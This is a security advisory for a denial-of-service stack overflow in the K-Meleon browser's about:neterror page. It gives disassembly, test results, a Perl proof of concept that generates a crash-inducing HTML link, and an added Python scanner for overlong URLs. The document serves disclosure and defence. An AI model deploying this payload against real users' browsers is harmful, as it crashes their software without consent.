
K-Meleon For Windows 1.5.3 / 1.5.4 Stack Overflow

Posted Aug 6, 2010
Authored by Lostmon | Site lostmon.blogspot.com

K-Meleon for Windows versions 1.5.3 and 1.5.4 suffer from a long href stack overflow vulnerability.

tags | exploit, denial of service, overflow
systems | windows
SHA-256 | 3d6095abf51ff1ac775313c1738c9e97bd643f2c84b5de5164bd64f51eef9ef5

############################################
K-Meleon for windows about:neterror Stack Overflow DoS
Vendor URL:http://kmeleon.sourceforge.net/
Advisory:http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Vendor notified:Yes exploit available: YES
############################################

K-Meleon is an extremely fast, customizable, lightweight web browser
based on the Gecko layout engine developed by Mozilla which is also
used by Firefox. K-Meleon is free, open source software released under
the GNU General Public License and is designed specifically for
Microsoft Windows (Win32) operating systems.

K-Meleon is prone to crashing when given a very long URL.
Internal web pages like about:neterror do not limit the number of
characters that a user can put in the 'c' and 'd' params, so if we
compose a malformed URL the browser can be crashed easily. This issue
is exploitable via web links like <a href="very long url">click here</a>,
via window.location.replace('very long url'), or via similar vectors.
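
A defensive check for the vectors described above, as an added example that is not part of the original advisory: a Python scanner that a proxy or mail gateway could run over HTML to flag overlong link targets and overlong 'c'/'d' values in about:neterror URLs. The thresholds, function names and sample input are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs

MAX_URL_LEN = 65536    # assumed policy ceiling for any link target
MAX_PARAM_LEN = 2048   # assumed ceiling for about:neterror 'c'/'d' values
# String literals passed to location.replace()/assign() inside inline scripts
JS_NAV = re.compile(r"location\.(?:replace|assign)\(\s*(['\"])(.*?)\1", re.S)

def check_url(url):
    """Return a list of findings for a single URL string."""
    findings = []
    if len(url) > MAX_URL_LEN:
        findings.append(f"url length {len(url)} > {MAX_URL_LEN}")
    if url.lower().startswith("about:neterror?"):
        params = parse_qs(url.split("?", 1)[1], keep_blank_values=True)
        for name in ("c", "d"):
            for value in params.get(name, []):
                if len(value) > MAX_PARAM_LEN:
                    findings.append(f"about:neterror '{name}' length {len(value)}")
    return findings

class LinkScanner(HTMLParser):
    """Collects findings from href/src attributes and inline script navigation."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for name, value in attrs:
            if name in ("href", "src") and value:
                self.findings += check_url(value)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            for match in JS_NAV.finditer(data):
                self.findings += check_url(match.group(2))

def scan_html(text):
    scanner = LinkScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings

# Constructed sample: one benign link, one link with an oversized 'c' value.
SAMPLE = ('<a href="http://example.com/">ok</a>'
          '<a href="about:neterror?e=connectionFailure&c=' + "/" * 4096 + '">x</a>')
```
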

#################
Versions Tested
#################

I have tested this issue on Windows XP SP3 and a fully patched Windows 7.

Windows XP SP3:
K-Meleon 1.5.3 & 1.5.4 Vulnerable (crashes)
K-Meleon 1.6.0a4 Vulnerable (crashes)

Windows 7 Ultimate:
K-Meleon 1.5.3 & 1.5.4 Vulnerable (crashes)
K-Meleon 1.6.0a4 Vulnerable (crashes)

############
References
############

Discovered: 29-07-2010
vendor notify:31-07-2010
Vendor Response:
Vendor patch:

########################
ASM code stack overflow
########################

ScreenShot => http://2.bp.blogspot.com/_oOk20qcOiUk/TFmDVYmRvHI/AAAAAAAAADM/GMymL2zrnRc/s1600/k-meleon.png

CPU Disasm
Address Hex dump Command
0043CB3F CC INT3
0043CB40 /$ 3D 00100000 CMP EAX,1000
0043CB45 |. 73 0E JNB SHORT 0043CB55
0043CB47 |. F7D8 NEG EAX
0043CB49 |. 03C4 ADD EAX,ESP
0043CB4B |. 83C0 04 ADD EAX,4
0043CB4E |. 8500 TEST DWORD PTR DS:[EAX],EAX
0043CB50 |. 94 XCHG EAX,ESP
0043CB51 |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
0043CB53 |. 50 PUSH EAX
0043CB54 |. C3 RETN
0043CB55 |> 51 PUSH ECX
0043CB56 |. 8D4C24 08 LEA ECX,[ARG.1]
0043CB5A |> 81E9 00100000 /SUB ECX,1000
0043CB60 |. 2D 00100000 |SUB EAX,1000
0043CB65 |. 8501 |TEST DWORD PTR DS:[ECX],EAX <== Stack overflow
0043CB67 |. 3D 00100000 |CMP EAX,1000
0043CB6C |.^ 73 EC \JNB SHORT 0043CB5A
0043CB6E |. 2BC8 SUB ECX,EAX
0043CB70 |. 8BC4 MOV EAX,ESP
0043CB72 |. 8501 TEST DWORD PTR DS:[ECX],EAX
0043CB74 |. 8BE1 MOV ESP,ECX
0043CB76 |. 8B08 MOV ECX,DWORD PTR DS:[EAX]
0043CB78 |. 8B40 04 MOV EAX,DWORD PTR DS:[EAX+4]
0043CB7B |. 50 PUSH EAX
0043CB7C \. C3 RETN
0043CB7D CC INT3
0043CB7E CC INT3




################
#Proof Of Concept
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long "a href" Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# Generate the file, open it with K-Meleon, click the link and wait a few seconds
######################################################################

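$archivo = $ARGV[0];    # name of the HTML file to generate
if(!defined($archivo))
{

print "Usage: $0 <archivo.html>\n";
exit 1;    # stop here when no file name was given

}

$cabecera = "<html>" . "\n";
# link to about:neterror with an overlong 'c' parameter
$payload = "<a href=\"about:neterror?e=connectionFailure&c=" . "/" x
1028135 . "\">click here if you can :)</a>" . "\n";
$fin = "</html>";

$datos = $cabecera . $payload . $fin;

# open for writing ('<' opens read-only, so nothing would be written)
open(FILE, '>', $archivo) or die "Cannot open $archivo: $!\n";
print FILE $datos;
close(FILE);

exit;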

################## EOF ######################

##############
Related Links
##############

vendor bugtracker : http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Possible related vuln: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Test Case : https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thanks to Phreak for support and for helping me understand the nature of this bug;
thanks to jajoni for testing it on Windows 7 x64.

Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....